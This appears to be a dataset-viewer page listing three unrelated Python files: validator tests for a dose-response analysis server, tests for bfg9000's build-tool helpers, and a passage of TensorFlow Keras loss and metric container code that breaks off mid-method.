gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
import json
from copy import deepcopy
from typing import Any, Dict
import bmds
import pytest
from bmds.bmds3.recommender import RecommenderSettings
from django.core.exceptions import ValidationError
from bmds_server.analysis import validators
def _missing_field(err, missing_field: str):
data = json.loads(err.value.message)
assert data[0]["loc"] == [missing_field]
assert data[0]["msg"] == "field required"
class TestInputValidation:
    """Full-payload validation via `validators.validate_input`.

    Each test builds a payload field by field: `partial=True` must accept the
    incomplete payload at every stage, while full validation must report the
    next missing field (datasets -> models -> options -> rules/recommender).
    """

    def test_bmds3_partial(self):
        """Incremental build-up of a continuous-dataset payload."""
        data: Dict[str, Any] = {
            "bmds_version": bmds.constants.BMDS330,
            "dataset_type": bmds.constants.CONTINUOUS,
        }
        # check minimal passes when partial
        assert validators.validate_input(data, partial=True) is None
        # but fails when complete
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "datasets")
        # add datasets, try again
        data["datasets"] = [
            {
                "dtype": "C",
                "metadata": {"id": 123},
                "doses": [0, 10, 50, 150, 400],
                "ns": [111, 142, 143, 93, 42],
                "means": [2.112, 2.095, 1.956, 1.587, 1.254],
                "stdevs": [0.235, 0.209, 0.231, 0.263, 0.159],
            }
        ]
        # dataset_options reference the dataset by its metadata id (123)
        data["dataset_options"] = [
            {"dataset_id": 123, "enabled": True, "degree": 0, "adverse_direction": -1}
        ]
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "models")
        # add models, try again
        data["models"] = {"frequentist_restricted": [bmds.constants.M_Power]}
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "options")
        # add options, try again
        data["options"] = [
            {
                "bmr_type": 2,
                "bmr_value": 1.0,
                "tail_probability": 0.95,
                "confidence_level": 0.95,
                "dist_type": 1,
            }
        ]
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "rules")
        # adding recommender settings finally makes the payload complete
        data["recommender"] = RecommenderSettings.build_default().dict()
        assert validators.validate_input(data, partial=True) is None
        assert validators.validate_input(data) is None

    def test_nested_dichotomous(self, nested_dichotomous_datasets):
        """Incremental build-up of a nested-dichotomous payload.

        `nested_dichotomous_datasets` is a pytest fixture defined outside this
        file (presumably in conftest.py — TODO confirm).
        """
        data: Dict[str, Any] = {
            "bmds_version": bmds.constants.BMDS330,
            "dataset_type": bmds.constants.NESTED_DICHOTOMOUS,
        }
        assert validators.validate_input(data, partial=True) is None
        # but fails when complete
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "datasets")
        # add datasets, try again; deepcopy so the shared fixture isn't mutated
        data["datasets"] = deepcopy(nested_dichotomous_datasets)
        data["dataset_options"] = [{"dataset_id": 123, "enabled": True}]
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "models")
        # add models, try again
        data["models"] = {"frequentist_restricted": [bmds.constants.M_NestedLogistic]}
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "options")
        # add options, try again
        data["options"] = [
            {
                "bmr_type": 1,
                "bmr_value": 1.0,
                "confidence_level": 0.95,
                "litter_specific_covariate": 1,
                "background": 1,
                "bootstrap_iterations": 1,
                "bootstrap_seed": 0,
            }
        ]
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "rules")
        data["recommender"] = RecommenderSettings.build_default().dict()
        assert validators.validate_input(data, partial=True) is None
        assert validators.validate_input(data) is None

    def test_multi_tumor(self):
        """Incremental build-up of a multi-tumor payload (two dichotomous datasets)."""
        data: Dict[str, Any] = {
            "bmds_version": bmds.constants.BMDS330,
            "dataset_type": bmds.constants.MULTI_TUMOR,
        }
        assert validators.validate_input(data, partial=True) is None
        # but fails when complete
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "datasets")
        # add datasets, try again
        data["datasets"] = [
            {
                "dtype": "D",
                "metadata": {"id": 123},
                "doses": [0, 10, 50, 150, 400],
                "ns": [20, 20, 20, 20, 20],
                "incidences": [0, 0, 1, 4, 11],
            },
            {
                "dtype": "D",
                "metadata": {"id": 124},
                "doses": [0, 10, 50, 150, 400],
                "ns": [20, 20, 20, 20, 20],
                "incidences": [0, 0, 1, 4, 11],
            },
        ]
        # one option entry per dataset, keyed by metadata id
        data["dataset_options"] = [
            {"dataset_id": 123, "enabled": True, "degree": 0},
            {"dataset_id": 124, "enabled": True, "degree": 0},
        ]
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "models")
        # add models, try again
        data["models"] = {"frequentist_restricted": [bmds.constants.M_Multistage]}
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "options")
        # add options, try again
        data["options"] = [
            {"bmr_type": 1, "bmr_value": 1.0, "confidence_level": 0.95},
        ]
        assert validators.validate_input(data, partial=True) is None
        with pytest.raises(ValidationError) as err:
            validators.validate_input(data)
        _missing_field(err, "rules")
        data["recommender"] = RecommenderSettings.build_default().dict()
        assert validators.validate_input(data, partial=True) is None
        assert validators.validate_input(data) is None
class TestModelValidation:
    """Model-selection validation via `validators.validate_models`.

    Covers: wrong model for the dataset type, duplicate models, empty model
    lists, and bayesian prior weights that do not sum to 1.
    """

    def test_bmds3_dichotomous(self):
        """Dichotomous model lists are validated against dichotomous models."""
        dtype = bmds.constants.DICHOTOMOUS
        probit = bmds.constants.M_Probit
        logprobit = bmds.constants.M_LogProbit
        # test success
        assert validators.validate_models(dtype, {"frequentist_restricted": [logprobit]},) is None
        # assert wrong model type (Power is a continuous model)
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype, {"frequentist_restricted": [bmds.constants.M_Power]},
            )
        assert "Invalid model(s) in frequentist_restricted: Power" in str(err)
        # assert duplicates model type
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype, {"frequentist_restricted": [logprobit, logprobit]},
            )
        assert "Models in frequentist_restricted are not unique" in str(err)
        # assert empty
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype, {"frequentist_restricted": []},
            )
        assert "At least one model must be selected" in str(err)
        # assert bayesian duplicates
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype,
                {
                    "bayesian": [
                        {"model": probit, "prior_weight": 0.3},
                        {"model": logprobit, "prior_weight": 0.4},
                        {"model": logprobit, "prior_weight": 0.3},
                    ]
                },
            )
        assert "Models in bayesian are not unique" in str(err)
        # assert bayesian prior_weight sum (0.5 + 0.49 != 1)
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype,
                {
                    "bayesian": [
                        {"model": probit, "prior_weight": 0.5},
                        {"model": logprobit, "prior_weight": 0.49},
                    ]
                },
            )
        assert "Prior weight in bayesian does not sum to 1" in str(err.value)

    def test_bmds3_continuous(self):
        """Continuous model lists get the same checks with continuous models."""
        dtype = bmds.constants.CONTINUOUS
        power = bmds.constants.M_Power
        linear = bmds.constants.M_Linear
        # test success
        assert validators.validate_models(dtype, {"frequentist_restricted": [power]},) is None
        # assert wrong model type (Probit is a dichotomous model)
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype, {"frequentist_restricted": [bmds.constants.M_Probit]},
            )
        assert "Invalid model(s) in frequentist_restricted: Probit" in str(err)
        # assert duplicates model type
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype, {"frequentist_restricted": [power, power]},
            )
        assert "Models in frequentist_restricted are not unique" in str(err)
        # assert empty
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype, {"frequentist_restricted": []},
            )
        assert "At least one model must be selected" in str(err)
        # assert bayesian duplicates
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype,
                {
                    "bayesian": [
                        {"model": power, "prior_weight": 0.3},
                        {"model": linear, "prior_weight": 0.4},
                        {"model": linear, "prior_weight": 0.3},
                    ]
                },
            )
        assert "Models in bayesian are not unique" in str(err)
        # assert bayesian prior_weight sum (0.5 + 0.49 != 1)
        with pytest.raises(ValidationError) as err:
            validators.validate_models(
                dtype,
                {
                    "bayesian": [
                        {"model": power, "prior_weight": 0.5},
                        {"model": linear, "prior_weight": 0.49},
                    ]
                },
            )
        assert "Prior weight in bayesian does not sum to 1" in str(err.value)
class TestOptionSetValidation:
    """Option-set validation via `validators.validate_options`."""

    def test_dichotomous(self):
        """A valid dichotomous option set passes; an empty list is rejected."""
        # test success
        data = [dict(bmr_type=1, bmr_value=0.1, confidence_level=0.95)]
        assert validators.validate_options(bmds.constants.DICHOTOMOUS, data) is None
        # must have at least one option
        data = []
        with pytest.raises(ValidationError) as err:
            validators.validate_options(bmds.constants.DICHOTOMOUS, data)
        assert "ensure this value has at least 1 items" in str(err)

    def test_continuous(self):
        """A valid continuous option set passes; an empty list is rejected."""
        # test success
        data = [
            {
                "bmr_type": 2,
                "bmr_value": 1.0,
                "tail_probability": 0.95,
                "confidence_level": 0.95,
                "dist_type": 1,
            }
        ]
        assert validators.validate_options(bmds.constants.CONTINUOUS, data) is None
        # must have at least one option
        data = []
        with pytest.raises(ValidationError) as err:
            validators.validate_options(bmds.constants.CONTINUOUS, data)
        assert "ensure this value has at least 1 items" in str(err)
| |
import re
from unittest import mock
from .. import *
from bfg9000 import shell
from bfg9000.languages import Languages
from bfg9000.path import Root
from bfg9000.tools import cc, common
# Register a minimal 'c' language definition so the tests below can look up
# its toolchain environment variables (CC / CFLAGS).
known_langs = Languages()
with known_langs.make('c') as x:
    x.vars(compiler='CC', flags='CFLAGS')
def mock_which(*args, **kwargs):
    """Fake `shell.which`: every lookup resolves to a single 'command' entry."""
    del args, kwargs  # accepted only for signature compatibility
    return ['command']
def mock_execute(args, **kwargs):
    """Fake `shell.execute` returning canned compiler/linker output.

    The first recognized flag found in `args` selects the canned response;
    anything unrecognized raises OSError, mimicking a failed subprocess.
    """
    canned_outputs = [
        ('--version',
         'g++ (Ubuntu 5.4.0-6ubuntu1~16.04.6) 5.4.0 20160609\n'
         'Copyright (C) 2015 Free Software Foundation, Inc.'),
        # (stdout, stderr) pair: ld writes its version banner to stderr.
        ('-Wl,--version', ('', '/usr/bin/ld --version\n')),
        ('-print-search-dirs',
         'libraries: =/lib/search/dir1:/lib/search/dir2\n'),
        ('-print-sysroot', '/'),
        ('--verbose', 'SEARCH_DIR("/usr")\n'),
    ]
    for flag, output in canned_outputs:
        if flag in args:
            return output
    raise OSError('unknown command: {}'.format(args))
class TestLibraryMacro(TestCase):
    """Macro names generated from a library path and its link mode."""

    def _assert_macros(self, lib_name, expected_stem):
        # Shared libraries get an *_EXPORTS macro; static ones get *_STATIC.
        self.assertEqual(common.library_macro(lib_name, 'shared_library'),
                         expected_stem + '_EXPORTS')
        self.assertEqual(common.library_macro(lib_name, 'static_library'),
                         expected_stem + '_STATIC')

    def test_simple(self):
        self._assert_macros('libfoo', 'LIBFOO')

    def test_subdir(self):
        self._assert_macros('dir/libfoo', 'DIR_LIBFOO')

    def test_leading_underscore(self):
        self._assert_macros('_dir/libfoo', 'LIB_DIR_LIBFOO')

    def test_leading_digits(self):
        self._assert_macros('1/libfoo', 'LIB_1_LIBFOO')
class TestMakeCommandConverter(TestCase):
    """Command-name converters (e.g. mapping a C compiler name to C++'s)."""

    def test_simple(self):
        converter = common.make_command_converter([('gcc', 'g++')])
        # Matches the whole word or hyphen-separated affixes...
        self.assertEqual(converter('gcc'), 'g++')
        self.assertEqual(converter('foo-gcc'), 'foo-g++')
        self.assertEqual(converter('gcc-foo'), 'g++-foo')
        # ...but not arbitrary substrings; no match returns None.
        self.assertEqual(converter('foo'), None)
        self.assertEqual(converter('foogcc'), None)
        self.assertEqual(converter('gccfoo'), None)

    def test_order(self):
        # Earlier pairs take precedence: 'clang-cl' must be listed before
        # 'clang' or it would never match.
        converter = common.make_command_converter([
            ('clang-cl', 'clang-cl++'),
            ('clang', 'clang++'),
        ])
        self.assertEqual(converter('clang'), 'clang++')
        self.assertEqual(converter('foo-clang'), 'foo-clang++')
        self.assertEqual(converter('clang-foo'), 'clang++-foo')
        self.assertEqual(converter('clang-cl'), 'clang-cl++')
        self.assertEqual(converter('foo-clang-cl'), 'foo-clang-cl++')
        self.assertEqual(converter('clang-cl-foo'), 'clang-cl++-foo')
        self.assertEqual(converter('foo'), None)

    def test_regex(self):
        # Compiled regexes are accepted as the "from" side of a pair.
        converter = common.make_command_converter([
            (re.compile(r'gcc(?:-[\d.]+)?(?:-(?:posix|win32))?'), 'windres'),
        ])
        self.assertEqual(converter('gcc'), 'windres')
        self.assertEqual(converter('gcc-9.1'), 'windres')
        self.assertEqual(converter('gcc-posix'), 'windres')
        self.assertEqual(converter('gcc-win32'), 'windres')
        self.assertEqual(converter('gcc-9.1-posix'), 'windres')
        self.assertEqual(converter('gcc-9.1-win32'), 'windres')
        self.assertEqual(converter('i686-w64-mingw32-gcc-9.1-win32'),
                         'i686-w64-mingw32-windres')

    def test_pair(self):
        # make_command_converter_pair builds forward and reverse converters.
        c_to_cxx, cxx_to_c = common.make_command_converter_pair([
            ('gcc', 'g++'),
        ])
        self.assertEqual(c_to_cxx('gcc'), 'g++')
        self.assertEqual(c_to_cxx('foo-gcc'), 'foo-g++')
        self.assertEqual(c_to_cxx('gcc-foo'), 'g++-foo')
        self.assertEqual(c_to_cxx('foo'), None)
        self.assertEqual(c_to_cxx('foogcc'), None)
        self.assertEqual(c_to_cxx('gccfoo'), None)
        self.assertEqual(cxx_to_c('g++'), 'gcc')
        self.assertEqual(cxx_to_c('foo-g++'), 'foo-gcc')
        self.assertEqual(cxx_to_c('g++-foo'), 'gcc-foo')
        self.assertEqual(cxx_to_c('foo'), None)
        self.assertEqual(cxx_to_c('foog++'), None)
        self.assertEqual(cxx_to_c('g++foo'), None)

    def test_invalid_regex(self):
        # Capture groups are rejected — presumably they'd corrupt the
        # replacement logic; NOTE(review): confirm against make_command_converter.
        with self.assertRaises(re.error):
            common.make_command_converter([(re.compile(r'([\d.]+)'), '')])
class TestNotBuildroot(CrossPlatformTestCase):
    """`common.not_buildroot`: which values denote something other than the build root."""

    def test_none(self):
        # None stands for the build root itself.
        self.assertFalse(common.not_buildroot(None))

    def test_path(self):
        self.assertTrue(common.not_buildroot(self.Path('foo')))
        # '.' in the default (build) root is the build root...
        self.assertFalse(common.not_buildroot(self.Path('.')))
        # ...but '.' rooted at srcdir is a different directory.
        self.assertTrue(common.not_buildroot(self.Path('.', Root.srcdir)))

    def test_misc(self):
        # Arbitrary non-path values are not the build root.
        self.assertTrue(common.not_buildroot('foo'))
class TestCommand(TestCase):
    """`common.Command` call forwarding and `run()` stdout/stderr defaults."""

    class MyCommand(common.Command):
        # Minimal concrete Command: _call just returns the assembled argv.
        def _call(self, cmd, *args):
            return cmd + list(args)

    def setUp(self):
        self.env = make_env(platform='linux')
        # NOTE(review): command appears to be a (name, argv, found?) triple —
        # confirm against common.Command's constructor.
        self.cmd = self.MyCommand(
            self.env, command=['mycmd', ['command'], True]
        )

    def test_call(self):
        """Calling the command forwards to _call; `cmd=` overrides the argv."""
        self.assertEqual(self.cmd(), [self.cmd])
        self.assertEqual(self.cmd('--foo'), [self.cmd, '--foo'])
        self.assertEqual(self.cmd(cmd='cmd'), ['cmd'])
        self.assertEqual(self.cmd('--foo', cmd='cmd'), ['cmd', '--foo'])

    def test_run(self):
        """run() defaults to piped stdout / devnull stderr, overridable per call."""
        M = shell.Mode

        def assert_called(mock, command, **kwargs):
            # Every run() should pass the env's variables and base dirs through.
            kwargs.update({'env': self.env.variables,
                           'base_dirs': self.env.base_dirs})
            mock.assert_called_once_with(command, **kwargs)

        with mock.patch('bfg9000.shell.execute') as e:
            self.cmd.run()
            assert_called(e, ['command'], stdout=M.pipe, stderr=M.devnull)
        with mock.patch('bfg9000.shell.execute') as e:
            self.cmd.run('--foo')
            assert_called(e, ['command', '--foo'], stdout=M.pipe,
                          stderr=M.devnull)
        with mock.patch('bfg9000.shell.execute') as e:
            self.cmd.run(stdout=M.normal)
            assert_called(e, ['command'], stdout=M.normal)
        with mock.patch('bfg9000.shell.execute') as e:
            self.cmd.run(stdout=M.normal, stderr='err')
            assert_called(e, ['command'], stdout=M.normal, stderr='err')
        with mock.patch('bfg9000.shell.execute') as e:
            self.cmd.run(stdout='out')
            assert_called(e, ['command'], stdout='out', stderr=M.devnull)
        with mock.patch('bfg9000.shell.execute') as e:
            self.cmd.run(stdout='out', stderr='err')
            assert_called(e, ['command'], stdout='out', stderr='err')
class TestChooseBuilder(CrossPlatformTestCase):
    """`common.choose_builder` candidate probing, with shell calls mocked out."""

    def __init__(self, *args, **kwargs):
        super().__init__(clear_variables=True, *args, **kwargs)

    def test_choose(self):
        """A working candidate is probed and its brand detected (gcc here,
        via the canned --version output in mock_execute)."""
        with mock.patch('bfg9000.shell.which', mock_which), \
             mock.patch('bfg9000.shell.execute', mock_execute):
            builder = common.choose_builder(self.env, known_langs['c'],
                                            (cc.CcBuilder,), candidates='cc')
        self.assertEqual(builder.brand, 'gcc')

    def test_not_found(self):
        """If `which` fails, a builder is still returned with brand 'unknown'
        (a warning is emitted; silenced here)."""
        def bad_which(*args, **kwargs):
            if args[0] == ['cc']:
                raise IOError('badness')
            else:
                return mock_which(*args, **kwargs)

        with mock.patch('bfg9000.shell.which', bad_which), \
             mock.patch('bfg9000.shell.execute', mock_execute), \
             mock.patch('warnings.warn', lambda s: None):
            builder = common.choose_builder(self.env, known_langs['c'],
                                            (cc.CcBuilder,), candidates='cc')
        self.assertEqual(builder.brand, 'unknown')

    def test_nonworking(self):
        """If probing the compiler always fails, choose_builder raises IOError."""
        def bad_execute(args, **kwargs):
            raise ValueError()

        with mock.patch('bfg9000.shell.which', mock_which), \
             mock.patch('bfg9000.shell.execute', bad_execute):
            msg = "^no working c compiler found; tried 'cc'$"
            with self.assertRaisesRegex(IOError, msg):
                common.choose_builder(self.env, known_langs['c'],
                                      (cc.CcBuilder,), candidates='cc')
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilites for `Model.compile`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import six
from tensorflow.python.distribute import distribution_strategy_context as ds_context
from tensorflow.python.keras import losses as losses_mod
from tensorflow.python.keras import metrics as metrics_mod
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.keras.utils import losses_utils
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
class Container(object):
  """Base Container class.

  Shared machinery for `LossesContainer` and `MetricsContainer`: conforming
  user-supplied structures to the model's output structure, and broadcasting
  a single object across multiple outputs.
  """

  def __init__(self, output_names=None):
    # May be None until `build`; the Functional API passes real output names.
    self._output_names = output_names

  def build(self, y_pred):
    """One-time setup; infers output names from `y_pred` if not provided."""
    if self._output_names is None:
      # In Subclass API, output names like 'output_1' are used for
      # `Metric` names.
      self._output_names = create_pseudo_output_names(y_pred)

  def _conform_to_outputs(self, outputs, struct):
    """Convenience method to conform `struct` to `outputs` structure.

    Mappings performed:
    (1) Map a dict to a list of outputs, using the output names.
    (2) Fill missing keys in a dict w/ `None`s.
    (3) Map a single item to all outputs.

    Args:
      outputs: Model predictions.
      struct: Arbitrary nested structure (e.g. of labels, sample_weights,
        losses, or metrics).

    Returns:
      Mapping of `struct` to `outputs` structure.
    """
    struct = map_to_output_names(outputs, self._output_names, struct)
    struct = map_missing_dict_keys(outputs, struct)
    # Allow passing one object that applies to all outputs.
    if not nest.is_nested(struct) and nest.is_nested(outputs):
      struct = nest.map_structure(lambda _: struct, outputs)
    return struct

  def _maybe_broadcast_to_outputs(self, outputs, objects):
    """Determines if losses / metrics should be applied to all outputs.

    NOTE: This method should only be called for Metrics / Losses, not for
    y_true / sample_weight.

    Args:
      outputs: Model predictions.
      objects: Arbitrary nested structure (e.g. of losses or metrics)

    Returns:
      Arbitrary nested structure of objects, maybe copied to each output.

    Applies a Loss / Metric to all outputs.
    """
    if not self._should_broadcast(objects):
      return objects

    # When there is more than one Model output, this is needed to keep
    # each Metric / Loss separate. When there is only one Model output,
    # the user-supplied object should be used.
    should_copy_objects = len(nest.flatten(outputs)) > 1

    def _broadcast_fn():
      if should_copy_objects:
        # Clone via the subclass hook so each output gets its own instance.
        return nest.map_structure(self._copy_object, objects)
      return objects

    return nest.map_structure(lambda _: _broadcast_fn(), outputs)

  def _should_broadcast(self, objects):
    # Subclass hook: whether `objects` is a single spec for all outputs.
    raise NotImplementedError

  def _copy_object(self, obj):
    # Subclass hook: how to clone `obj` when broadcasting across outputs.
    raise NotImplementedError
class LossesContainer(Container):
  """A container class for losses passed to `Model.compile`."""

  def __init__(self, losses, loss_weights=None, output_names=None):
    super(LossesContainer, self).__init__(output_names=output_names)

    # Keep user-supplied values untouched for recompiling and serialization.
    self._user_losses = losses
    self._user_loss_weights = loss_weights

    # Working copies; restructured and converted to `Loss` objects in build().
    self._losses = losses
    self._loss_weights = loss_weights
    self._per_output_metrics = None  # Per-output losses become metrics.
    self._loss_metric = metrics_mod.Mean(name='loss')  # Total loss.
    self._built = False

  @property
  def metrics(self):
    """Per-output loss metrics."""
    if not self._built:
      return []
    per_output_metrics = [
        metric_obj for metric_obj in nest.flatten(self._per_output_metrics)
        if metric_obj is not None
    ]
    return [self._loss_metric] + per_output_metrics

  def build(self, y_pred):
    """One-time setup of loss objects."""
    super(LossesContainer, self).build(y_pred)

    # Broadcast/conform before converting, so each output gets its own
    # `Loss` object; the final flatten fixes the iteration order used in
    # __call__ (parallel with y_pred / loss_weights / per-output metrics).
    self._losses = self._maybe_broadcast_to_outputs(y_pred, self._losses)
    self._losses = self._conform_to_outputs(y_pred, self._losses)
    self._losses = nest.map_structure(self._get_loss_object, self._losses)
    self._losses = nest.flatten(self._losses)

    self._loss_weights = self._maybe_broadcast_to_outputs(
        y_pred, self._loss_weights)
    self._loss_weights = self._conform_to_outputs(y_pred, self._loss_weights)
    self._loss_weights = nest.flatten(self._loss_weights)

    self._create_metrics()
    self._built = True

  @property
  def built(self):
    return self._built

  def _create_metrics(self):
    """Creates per-output loss metrics, but only for multi-output Models."""
    if len(self._output_names) == 1:
      # Single-output: the total-loss metric alone suffices.
      self._per_output_metrics = [None]
    else:
      self._per_output_metrics = []
      for loss_obj, output_name in zip(self._losses, self._output_names):
        if loss_obj is None:
          self._per_output_metrics.append(None)
        else:
          self._per_output_metrics.append(
              metrics_mod.Mean(output_name + '_loss'))

  def __call__(self,
               y_true,
               y_pred,
               sample_weight=None,
               regularization_losses=None):
    """Computes the overall loss.

    Args:
      y_true: An arbitrary structure of Tensors representing the ground truth.
      y_pred: An arbitrary structure of Tensors representing a Model's outputs.
      sample_weight: An arbitrary structure of Tensors representing the
        per-sample loss weights. If one Tensor is passed, it is used for all
        losses. If multiple Tensors are passed, the structure should match
        `y_pred`.
      regularization_losses: Additional losses to be added to the total loss.

    Returns:
      Tuple of `(total_loss, per_output_loss_list)`
    """
    y_true = self._conform_to_outputs(y_pred, y_true)
    sample_weight = self._conform_to_outputs(y_pred, sample_weight)

    if not self._built:
      self.build(y_pred)

    y_pred = nest.flatten(y_pred)
    y_true = nest.flatten(y_true)
    sample_weight = nest.flatten(sample_weight)

    loss_values = []  # Used for gradient calculation.
    loss_metric_values = []  # Used for loss metric calculation.
    batch_dim = None
    zip_args = (y_true, y_pred, sample_weight, self._losses, self._loss_weights,
                self._per_output_metrics)
    for y_t, y_p, sw, loss_obj, loss_weight, metric_obj in zip(*zip_args):
      if y_t is None or loss_obj is None:  # Ok to have no loss for an output.
        continue

      y_t, y_p, sw = match_dtype_and_rank(y_t, y_p, sw)
      sw = apply_mask(y_p, sw, get_mask(y_p))
      loss_value = loss_obj(y_t, y_p, sample_weight=sw)

      loss_metric_value = loss_value
      # Correct for the `Mean` loss metrics counting each replica as a batch.
      if loss_obj.reduction == losses_utils.ReductionV2.SUM:
        loss_metric_value *= ds_context.get_strategy().num_replicas_in_sync

      # Derive the batch dim from the first labeled output only; used as the
      # sample_weight so `Mean` averages per-example rather than per-batch.
      if batch_dim is None:
        if tf_utils.is_ragged(y_t):
          batch_dim = y_t.nrows()
        else:
          batch_dim = array_ops.shape(y_t)[0]

      if metric_obj is not None:
        metric_obj.update_state(loss_metric_value, sample_weight=batch_dim)

      if loss_weight is not None:
        loss_value *= loss_weight
        loss_metric_value *= loss_weight

      # Only averaged reductions are rescaled for distribution; SUM losses
      # were already corrected above for metric purposes only.
      if (loss_obj.reduction == losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE or
          loss_obj.reduction == losses_utils.ReductionV2.AUTO):
        loss_value = losses_utils.scale_loss_for_distribution(loss_value)

      loss_values.append(loss_value)
      loss_metric_values.append(loss_metric_value)

    if regularization_losses:
      regularization_losses = losses_utils.cast_losses_to_common_dtype(
          regularization_losses)
      reg_loss = math_ops.add_n(regularization_losses)
      loss_metric_values.append(reg_loss)
      loss_values.append(losses_utils.scale_loss_for_distribution(reg_loss))

    if loss_values:
      loss_metric_values = losses_utils.cast_losses_to_common_dtype(
          loss_metric_values)
      total_loss_metric_value = math_ops.add_n(loss_metric_values)
      self._loss_metric.update_state(
          total_loss_metric_value, sample_weight=batch_dim)

      loss_values = losses_utils.cast_losses_to_common_dtype(loss_values)
      total_loss = math_ops.add_n(loss_values)
      return total_loss
    else:
      # Ok for a model to have no compiled loss.
      return array_ops.zeros(shape=())

  def reset_states(self):
    """Resets the state of loss metrics."""
    if not self._built:
      return
    metrics = [self._loss_metric] + nest.flatten(self._per_output_metrics)
    for metric_obj in metrics:
      if metric_obj is not None:
        metric_obj.reset_states()

  def _get_loss_object(self, loss):
    """Returns a `Loss` object.

    Converts the user-supplied loss to a `Loss` object. Also allows
    `SUM_OVER_BATCH_SIZE` reduction to be used for this loss.

    Args:
      loss: A string, function, or `Loss` object.

    Returns:
      A `Loss` object.
    """
    if loss is None:
      return None  # Ok to have no loss for an output.

    loss = losses_mod.get(loss)
    if not isinstance(loss, losses_mod.Loss):
      loss_name = get_custom_object_name(loss)
      if loss_name is None:
        raise ValueError('Loss should be a callable, found: {}'.format(loss))
      loss = losses_mod.LossFunctionWrapper(loss, name=loss_name)
    loss._allow_sum_over_batch_size = True  # pylint: disable=protected-access
    return loss

  def _should_broadcast(self, obj):
    # A single (non-nested) loss spec applies to every output.
    return not nest.is_nested(obj)

  def _copy_object(self, obj):
    return obj  # Losses don't need to be copied.
class MetricsContainer(Container):
"""A container class for metrics passed to `Model.compile`."""
def __init__(self, metrics=None, weighted_metrics=None, output_names=None,
from_serialized=False):
"""Initializes a container for metrics.
Arguments:
metrics: see the `metrics` argument from `tf.keras.Model.compile`.
weighted_metrics: see the `weighted_metrics` argument from
`tf.keras.Model.compile`.
output_names: A list of strings of names of outputs for the model.
from_serialized: Whether the model being compiled is from a serialized
model. Used to avoid redundantly applying pre-processing renaming
steps.
"""
super(MetricsContainer, self).__init__(output_names=output_names)
# Keep user-supplied values untouched for recompiling and serialization.
self._user_metrics = metrics
self._user_weighted_metrics = weighted_metrics
self._metrics = metrics
self._weighted_metrics = weighted_metrics
self._built = False
self._from_serialized = from_serialized
@property
def metrics(self):
"""All metrics in this container."""
if not self._built:
return []
return self._metrics_in_order
@property
def unweighted_metrics(self):
"""Metrics in this container that should not be passed `sample_weight`."""
if not self._built:
return None
return nest.flatten(self._metrics)
@property
def weighted_metrics(self):
"""Metrics in this container that should be passed `sample_weight`."""
if not self._built:
return None
return nest.flatten(self._weighted_metrics)
def build(self, y_pred, y_true):
"""One-time setup of metric objects."""
super(MetricsContainer, self).build(y_pred)
self._metrics = self._maybe_broadcast_to_outputs(y_pred, self._metrics)
self._metrics = self._conform_to_outputs(y_pred, self._metrics)
self._weighted_metrics = self._maybe_broadcast_to_outputs(
y_pred, self._weighted_metrics)
self._weighted_metrics = self._conform_to_outputs(y_pred,
self._weighted_metrics)
# Standardize on tuple since `tf.data` turns lists into `Tensor`s.
y_pred = nest.list_to_tuple(y_pred)
y_true = nest.list_to_tuple(y_true)
self._metrics = nest.list_to_tuple(self._metrics)
self._weighted_metrics = nest.list_to_tuple(self._weighted_metrics)
# Convert to `Metric` objects, potentially disambiguating based on output
# properties.
self._metrics = nest.map_structure_up_to(y_pred, self._get_metric_objects,
self._metrics, y_true, y_pred)
self._weighted_metrics = nest.map_structure_up_to(y_pred,
self._get_metric_objects,
self._weighted_metrics,
y_true, y_pred)
self._metrics = nest.flatten_up_to(y_pred, self._metrics, check_types=False)
self._weighted_metrics = nest.flatten_up_to(
y_pred, self._weighted_metrics, check_types=False)
# Assumes metrics, weighted_metrics have been flattened up to outputs.
#
# If we are loading a model that has been already serialized, we do not
# want to re-apply any pre-processing metric renaming steps.
if not self._from_serialized:
self._set_metric_names()
self._create_ordered_metrics()
self._built = True
@property
def built(self):
return self._built
def _set_metric_names(self):
"""Sets unique metric names."""
# For multi-output models, prepend the output name to the metric name.
# For weighted metrics, prepend "weighted_" if the name would be non-unique.
# pylint: disable=protected-access
metric_names = set()
